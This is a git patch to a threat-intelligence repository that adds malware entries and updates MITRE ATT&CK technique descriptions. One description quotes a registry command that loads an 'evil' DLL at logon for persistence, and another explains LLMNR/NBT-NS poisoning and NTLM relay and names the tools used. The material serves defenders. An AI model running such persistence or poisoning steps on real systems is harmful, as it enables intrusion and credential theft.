"https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], @@ -16203,12 +18428,26 @@ "uuid": "000e25a4-4623-4afc-883d-ecc15be8f9d0", "value": "X-Tunnel (.NET)" }, + { + "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it \u201cXwo\u201d - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo", + "https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8a57cd75-4572-47c2-b5ef-55df978258de", + "value": "Xwo" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" ], "synonyms": [ @@ -16284,8 +18523,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", + "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", + "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/", + "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html", + "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html", + "https://securelist.com/a-zebrocy-go-downloader/89419/" ], "synonyms": [ "Zekapab" @@ -16336,6 +18582,7 @@ ], "synonyms": [ "Max++", + "Sirefef", "Smiscer" ], "type": [] @@ -16553,5 +18800,5 @@ "value": "Zyklon" } ], - "version": 1838 + "version": 2559 } From 94466d8196dce3dafd2a41942d02e4c5362dbe51 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Tue, 30 Apr 2019 19:07:57 +0200 Subject: [PATCH 20/50] chg: [ATT&CK] updated to the latest version --- clusters/mitre-attack-pattern.json | 1044 +- clusters/mitre-course-of-action.json | 1313 +- ...re-enterprise-attack-course-of-action.json | 9 +- clusters/mitre-intrusion-set.json | 10573 ++++++---- clusters/mitre-malware.json | 17177 ++++++++++------ .../mitre-mobile-attack-attack-pattern.json | 2 +- .../mitre-mobile-attack-course-of-action.json | 2 +- clusters/mitre-mobile-attack-malware.json | 16 +- clusters/mitre-pre-attack-attack-pattern.json | 2 +- clusters/mitre-pre-attack-intrusion-set.json | 16 +- clusters/mitre-tool.json | 2274 +- 11 files changed, 21331 insertions(+), 11097 deletions(-) diff --git a/clusters/mitre-attack-pattern.json b/clusters/mitre-attack-pattern.json index 677e86c..d766609 100644 --- a/clusters/mitre-attack-pattern.json +++ b/clusters/mitre-attack-pattern.json @@ -229,7 +229,7 @@ "value": "Acquire and/or use 3rd party infrastructure services - T1329" }, { - "description": "Code signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an signed piece of code even if they don't know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)", + "description": "Code signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)", "meta": { "external_id": "T1310", "kill_chain": [ @@ -313,7 +313,7 @@ "value": "Compromise 3rd party infrastructure to support delivery - T1312" }, { - "description": "Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an signed piece of code even if they don't know who issued the certificate or who the author is. (Citation: DiginotarCompromise)", + "description": "Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: DiginotarCompromise)", "meta": { "external_id": "T1332", "kill_chain": [ @@ -393,7 +393,7 @@ "value": "Abuse of iOS Enterprise App Signing Key - T1445" }, { - "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.\n\nApp stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses:\n\n* [Download New Code at Runtime](https://attack.mitre.org/techniques/T1407)\n* [Obfuscated or Encrypted Payload](https://attack.mitre.org/techniques/T1406)\n* PRE-ATT&CK: [Choose pre-compromised mobile app developer account credentials or signing keys](https://attack.mitre.org/techniques/T1391)\n* PRE-ATT&CK: [Test ability to evade automated mobile application security analysis performed by app stores](https://attack.mitre.org/techniques/T1393)\n\nAdversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)\n\nAdversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)\n\nAdversaries may also use control of a target's Google account to use the Google Play Store's remote installation capability to install apps onto the Android devices associated with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)", + "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.\n\nApp stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses:\n\n* [Download New Code at Runtime](https://attack.mitre.org/techniques/T1407)\n* [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1406)\n* PRE-ATT&CK: [Choose pre-compromised mobile app developer account credentials or signing keys](https://attack.mitre.org/techniques/T1391)\n* PRE-ATT&CK: [Test ability to evade automated mobile application security analysis performed by app stores](https://attack.mitre.org/techniques/T1393)\n\nAdversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)\n\nAdversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)\n\nAdversaries may also use control of a target's Google account to use the Google Play Store's remote installation capability to install apps onto the Android devices associated with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)", "meta": { "external_id": "ECO-22", "kill_chain": [ @@ -561,7 +561,7 @@ "value": "Identify vulnerabilities in third-party software libraries - T1389" }, { - "description": "Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nThe HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Visa and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", + "description": "Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nThe HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "meta": { "external_id": "CAPEC-270", "kill_chain": [ @@ -587,7 +587,7 @@ "value": "Registry Run Keys / Startup Folder - T1060" }, { - "description": "An adversary could exploit signaling system vulnerabilities to redirect calls or text messages to a phone number under the attacker's control. The adversary could then act as a man-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)", + "description": "An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control. The adversary could then act as a man-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).", "meta": { "external_id": "CEL-37", "kill_chain": [ @@ -604,7 +604,8 @@ "https://www.youtube.com/watch?v=q0n5ySqbfdI", "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf", "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf", - "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf" + "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf", + "https://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/" ] }, "uuid": "fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d", @@ -692,8 +693,8 @@ "https://attack.mitre.org/techniques/T1450", "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html", "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf", - "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf", "https://www.youtube.com/watch?v=q0n5ySqbfdI", + "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf", "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf", "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf" ] @@ -1055,7 +1056,7 @@ "value": "Modify OS Kernel or Boot Partition - T1398" }, { - "description": "If the mobile device is connected (typically via USB) to a charging station or a PC, for example to charge the device's battery, then a compromised or malicious charging station or PC could attempt to exploit the mobile device via the connection.\n\nKrebs described this technique in (Citation: Krebs-JuiceJacking). Lau et al. (Citation: Lau-Mactans) demonstrated the ability to inject malicious applications into an iOS device via USB. Hay (Citation: IBM-NexusUSB) demonstrated the ability to exploit a Nexus 6 or 6P device over USB and then gain the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location. Horn (Citation: GoogleProjectZero-OATmeal) demonstrated the ability to exploit Android devices such as the Google Pixel 2 over USB.\n\nProducts from Cellebrite and Grayshift purportedly can use physical access to the data port to unlock the passcode on some iOS devices (Citation: Computerworld-iPhoneCracking).", + "description": "If the mobile device is connected (typically via USB) to a charging station or a PC, for example to charge the device's battery, then a compromised or malicious charging station or PC could attempt to exploit the mobile device via the connection(Citation: Krebs-JuiceJacking).\n\nPrevious demonstrations have included:\n\n* Injecting malicious applications into iOS devices(Citation: Lau-Mactans).\n* Exploiting a Nexus 6 or 6P device over USB and gaining the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location(Citation: IBM-NexusUSB).\n* Exploiting Android devices such as the Google Pixel 2 over USB(Citation: GoogleProjectZero-OATmeal).\n\nProducts from Cellebrite and Grayshift purportedly can use physical access to the data port to unlock the passcode on some iOS devices(Citation: Computerworld-iPhoneCracking).", "meta": { "external_id": "PHY-1", "kill_chain": [ @@ -1079,7 +1080,7 @@ "value": "Exploit via Charging Station or PC - T1458" }, { - "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.\n\nDelivery methods for the malicious application include:\n\n* [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) - Including the mobile app package as an attachment to an email message.\n* [Spearphishing Link](https://attack.mitre.org/techniques/T1192) - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.\n\nAs a prerequisite, adversaries may use this PRE-ATT&CK technique:\n\n* [Obtain Apple iOS enterprise distribution key pair and certificate](https://attack.mitre.org/techniques/T1392)", + "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.\n\nDelivery methods for the malicious application include:\n\n* [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) - Including the mobile app package as an attachment to an email message.\n* [Spearphishing Link](https://attack.mitre.org/techniques/T1192) - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.\n* Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)\n\nAs a prerequisite, adversaries may use this PRE-ATT&CK technique:\n\n* [Obtain Apple iOS enterprise distribution key pair and certificate](https://attack.mitre.org/techniques/T1392)", "meta": { "external_id": "ECO-21", "kill_chain": [ @@ -1093,7 +1094,10 @@ "https://attack.mitre.org/techniques/T1476", "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html", "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html", - "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html" + "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html", + "https://www.ibtimes.co.uk/danger-lurks-third-party-android-app-stores-1544861", + "https://blog.trendmicro.com/trendlabs-security-intelligence/user-beware-rooting-malware-found-in-3rd-party-app-stores/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/flappy-bird-and-third-party-app-stores/" ] }, "uuid": "53263a67-075e-48fa-974b-91c5b5445db7", @@ -1114,7 +1118,7 @@ "value": "Upload, install, and configure software/tools - T1362" }, { - "description": "An Android application can listen for the BOOT_COMPLETED broadcast, ensuring that the app's functionality will be activated every time the device starts up without having to wait for the device user to manually start the app.\n\n Zhou and Jiang (Citation: Zhou) analyzed 1260 Android malware samples belonging to 49 families of malware, and determined that 29 malware families and 83.3% of the samples listened for BOOT_COMPLETED.", + "description": "An Android application can listen for the BOOT_COMPLETED broadcast, ensuring that the app's functionality will be activated every time the device starts up without having to wait for the device user to manually start the app.\n\nAn analysis published in 2012(Citation: Zhou) of1260 Android malware samples belonging to 49 families of malware determined that 29 malware families and 83.3% of the samples listened for BOOT_COMPLETED.", "meta": { "external_id": "T1402", "kill_chain": [ @@ -1458,7 +1462,7 @@ "value": "Data from Network Shared Drive - T1039" }, { - "description": "An app could download and execute dynamic code (not included in the original application package) after installation to evade static analysis techniques (and potentially dynamic analysis techniques) used for application vetting or application store review (Citation: Poeplau-ExecuteThis). \n\nOn Android, dynamic code could include native code, Dalvik code, or JavaScript code that uses the Android WebView's JavascriptInterface capability (Citation: Bromium-AndroidRCE).\n\nOn iOS, techniques for executing dynamic code downloaded after application installation include JSPatch (Citation: FireEye-JSPatch). Wang et al. describe a related method of constructing malicious logic at app runtime on iOS (Citation: Wang).", + "description": "An app could download and execute dynamic code (not included in the original application package) after installation to evade static analysis techniques (and potentially dynamic analysis techniques) used for application vetting or application store review.(Citation: Poeplau-ExecuteThis)\n\nOn Android, dynamic code could include native code, Dalvik code, or JavaScript code that uses the Android WebView's JavascriptInterface capability.(Citation: Bromium-AndroidRCE)\n\nOn iOS, techniques also exist for executing dynamic code downloaded after application installation.(Citation: FireEye-JSPatch)(Citation: Wang)", "meta": { "external_id": "APP-20", "kill_chain": [ @@ -1585,7 +1589,7 @@ "value": "Image File Execution Options Injection - T1183" }, { - "description": "A malicious app can register as a device keyboard and intercept keypresses containing sensitive values such as usernames and passwords. Zeltser (Citation: Zeltser-Keyboard) describes these risks.\n\nBoth iOS and Android require the user to explicitly authorize use of third party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested.", + "description": "A malicious app can register as a device keyboard and intercept keypresses containing sensitive values such as usernames and passwords(Citation: Zeltser-Keyboard).\n\nBoth iOS and Android require the user to explicitly authorize use of third party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested.", "meta": { "external_id": "T1417", "kill_chain": [ @@ -1706,7 +1710,7 @@ "value": "Determine secondary level tactical element - T1244" }, { - "description": "With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC. Wang and Stavrou (Citation: Wang-ExploitingUSB) and Kamkar (Citation: ArsTechnica-PoisonTap) describe this technique. This technique has been demonstrated on Android, and we are unaware of any demonstrations on iOS.", + "description": "With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.", "meta": { "external_id": "PHY-2", "kill_chain": [ @@ -1932,7 +1936,7 @@ "value": "Automated system performs requested action - T1384" }, { - "description": "If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication. For example, He et al. (Citation: mHealth) describe numerous healthcare-related applications that did not properly protect network communication.", + "description": "If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication.(Citation: mHealth)", "meta": { "external_id": "APP-1", "kill_chain": [ @@ -2037,7 +2041,7 @@ "value": "Compromise of externally facing system - T1388" }, { - "description": "An attacker could jam radio signals (e.g. Wi-Fi, cellular, GPS) to prevent the mobile device from communicating. (Citation: NIST-SP800187)", + "description": "An attacker could jam radio signals (e.g. Wi-Fi, cellular, GPS) to prevent the mobile device from communicating. (Citation: NIST-SP800187)(Citation: CNET-Celljammer)(Citation: NYTimes-Celljam)(Citation: Digitaltrends-Celljam)(Citation: Arstechnica-Celljam)", "meta": { "external_id": "GPS-0", "kill_chain": [ @@ -2053,7 +2057,11 @@ "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-8.html", "https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-5.html", "https://pages.nist.gov/mobile-threat-catalogue/gps-threats/GPS-0.html", - "http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf" + "http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf", + "https://www.cnet.com/news/man-put-cell-phone-jammer-in-car-to-stop-driver-calls-fcc-says/", + "https://www.nytimes.com/2007/11/04/technology/04jammer.html", + "https://www.digitaltrends.com/mobile/florida-teacher-punished-after-signal-jamming-his-students-cell-phones/", + "https://arstechnica.com/tech-policy/2016/03/man-accused-of-jamming-passengers-cell-phones-on-chicago-subway/" ] }, "uuid": "d2e112dc-f6d4-488d-b8df-ecbfb57a0a2d", @@ -2080,7 +2088,7 @@ "value": "Lock User Out of Device - T1446" }, { - "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices.", + "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices.(Citation: Krebs-Location)", "meta": { "external_id": "EMM-7", "kill_chain": [ @@ -2093,7 +2101,8 @@ "refs": [ "https://attack.mitre.org/techniques/T1468", "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html", - "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html" + "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html", + "https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/" ] }, "uuid": "6f86d346-f092-4abc-80df-8558a90c426a", @@ -2184,6 +2193,38 @@ "uuid": "58d0b955-ae3d-424a-a537-2804dab38793", "value": "Unconditional client-side exploitation/Injected Website/Driveby - T1372" }, + { + "description": "Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)", + "meta": { + "external_id": "T1171", + "kill_chain": [ + "mitre-attack:credential-access" + ], + "mitre_data_sources": [ + "Windows event logs", + "Windows Registry", + "Packet capture", + "Netflow/Enclave netflow" + ], + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1171", + "https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution", + "https://technet.microsoft.com/library/cc958811.aspx", + "https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html", + "https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html", + "https://github.com/nomex/nbnspoof", + "https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response", + "https://github.com/SpiderLabs/Responder", + "https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning", + "https://github.com/Kevin-Robertson/Conveigh" + ] + }, + "uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", + "value": "LLMNR/NBT-NS Poisoning and Relay - T1171" + }, { "description": "Google and Apple provide Google Cloud Messaging and Apple Push Notification Service, respectively, services designed to enable efficient communication between third-party mobile app backend servers and the mobile apps running on individual devices. These services maintain an encrypted connection between every mobile device and Google or Apple that cannot easily be inspected and must be allowed to traverse networks as part of normal device operation. These services could be used by adversaries for communication to compromised mobile devices. (Citation: Securelist Mobile Malware 2013) (Citation: DroydSeuss)", "meta": { @@ -2229,7 +2270,7 @@ "value": "Standard Non-Application Layer Protocol - T1095" }, { - "description": "An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication as described in NIST SP 800-153 (Citation: NIST-SP800153). \n\nFor example, Kaspersky describes a threat actor they call DarkHotel that targeted hotel Wi-Fi networks, using them to compromise computers belonging to business executives (Citation: Kaspersky-DarkHotel).", + "description": "An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: Kaspersky-DarkHotel).", "meta": { "external_id": "LPN-0", "kill_chain": [ @@ -2250,7 +2291,7 @@ "value": "Rogue Wi-Fi Access Points - T1465" }, { - "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, [Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)\n\nAnother example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.", + "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, [Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)\n\nAnother example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided 